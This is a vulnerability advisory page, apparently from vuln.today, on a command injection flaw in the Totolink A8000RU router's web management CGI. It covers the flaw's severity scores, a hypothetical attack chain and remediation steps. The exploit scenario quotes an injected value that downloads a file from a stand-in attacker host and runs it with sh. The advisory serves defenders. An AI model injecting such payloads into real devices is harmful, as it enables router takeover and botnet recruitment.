Skip to main content

Totolink A8000RU CVE-2026-9454

| EUVD-2026-31670 HIGH
OS Command Injection (CWE-78)
2026-05-25 VulDB GHSA-3h6x-px3r-wh95
Command Injection A8000Ru
8.9
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
8.9 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

4
Analysis Generated
Jun 08, 2026 - 09:41 vuln.today
Severity Changed
May 26, 2026 - 19:07 NVD
CRITICAL HIGH
CVSS changed
May 26, 2026 - 19:07 NVD
9.8 (CRITICAL) 8.9 (HIGH)
CVE Published
May 25, 2026 - 11:30 nvd
HIGH 8.9

DescriptionCVE.org

A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerability affects the function setOpenVpnCertGenerationCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Executing a manipulation of the argument servername can lead to os command injection. The attack may be launched remotely. The exploit has been published and may be used.

AnalysisAI

OS command injection in the Totolink A8000RU router (firmware 7.1cu.643_b20200521) allows remote unauthenticated attackers to execute arbitrary commands via the servername parameter of the setOpenVpnCertGenerationCfg function in /cgi-bin/cstecgi.cgi. Publicly available exploit code exists (GitHub PoC), and although the EPSS score is modest (0.89%, 76th percentile), the CVSS 4.0 score of 8.9 reflects network-reachable, no-privilege, no-interaction exploitation with high confidentiality, integrity, and availability impact. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Discover exposed A8000RU admin interface
Delivery
Craft POST to /cgi-bin/cstecgi.cgi
Exploit
Inject shell metacharacters in servername parameter
Install
setOpenVpnCertGenerationCfg passes argument to shell
C2
Command executes as root on router
Execute
Install persistent implant or botnet agent
Impact
Pivot to internal network or join DDoS swarm
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Requires network reachability to TCP-accessible Web Management Interface of a Totolink A8000RU running firmware 7.1cu.643_b20200521, and the ability to reach the /cgi-bin/cstecgi.cgi endpoint with the setOpenVpnCertGenerationCfg action. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H, E:P) describes a network-accessible, low-complexity, unauthenticated bug with proven exploit code - a worst-case profile for an internet-exposed device. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with network reachability to the router's Web Management Interface sends a single crafted HTTP POST to /cgi-bin/cstecgi.cgi invoking setOpenVpnCertGenerationCfg with a servername value containing shell metacharacters (e.g. `; wget http://attacker/x -O /tmp/x; sh /tmp/x`). …
Remediation No vendor-released patch identified at time of analysis - Totolink has not published a fixed firmware build for the A8000RU in the available references (https://www.totolink.net/, https://nvd.nist.gov/vuln/detail/CVE-2026-9454, https://vuldb.com/vuln/365435). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Identify all Totolik A8000RU routers in production (particularly firmware 7.1cu.643_b20200521) and immediately restrict network access to their administration interfaces using firewall rules-permit management access only from specific trusted internal IP ranges. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-9454 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy